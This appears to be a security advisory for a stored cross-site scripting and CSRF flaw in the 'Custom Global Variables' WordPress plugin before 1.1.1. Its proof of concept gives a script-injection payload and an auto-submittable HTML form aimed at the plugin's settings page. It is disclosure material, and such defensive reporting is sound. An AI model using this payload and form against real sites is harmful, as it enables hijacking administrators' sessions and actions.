Custom Global Variables < 1.1.1 - Stored Cross-Site Scripting (XSS)
The plugin does not sanitise the 'name' field of the variable added in its settings, leading to a Stored Cross-Site Scripting issue. Attackers could also use the lack of CSRF and capability checks to make a logged in administrator add the payload and make them perform further unwanted actions.
Proof of Concept
As an administrator, go to the Settings > Custom Global Variables page, add the following payload ("><script>alert(/XSS/)</script><") in the 'name' field, add whatever value in the 'value' field and submit it
<form action="https://example.com/wp-admin/options-general.php?page=custom-global-variables" method="POST">
<input type="hidden" name="vars[name]" value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="vars[val]" value="a" />
<input type="submit" value="Submit request" />